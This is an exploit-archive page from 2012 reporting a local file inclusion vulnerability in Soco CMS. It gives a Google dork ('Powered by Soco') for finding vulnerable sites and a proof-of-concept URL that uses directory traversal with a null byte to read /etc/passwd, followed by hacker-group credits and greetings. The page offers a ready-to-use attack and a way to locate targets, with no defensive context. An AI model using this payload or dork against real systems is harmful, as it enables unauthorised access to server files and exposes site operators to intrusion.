Soco CMS Local File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Soco CMS Local File Include Vulnerability
# Published : 2012-04-29
# Author :
# Previous Title : GENU CMS 2012.3 - Multiple SQL Injection Vulnerabilities
# Next Title : Vanilla Forums LatestComment 1.1 Plugin Persistent XSS

#######################################################################################
# Exploit Title: Soco CMS Local File Include
# Google Dork: "Powered by Soco"
# Date: 28/04/2012
# Author: #BHG Security Center
# H0me : www.black-hg.org
# Software Link: http://hentan.eu/php/Soco/
# Version: last version
# Tested on: Linux/Ubuntu - Windows7
#######################################################################################
# p0c :
#
# index.php?page=../../../../../../../../../../../../../etc/passwd%00
#
#######################################################################################
# Special Thanks To : Net.Edit0r - A.Cr0x - 3H34N - Mr.XHat - G3n3rall - Nol1m1t
#######################################################################################
# GreetZ : Mikili - 0x0ptim0us - 2MzRp - KingCope - Crim3r
#######################################################################################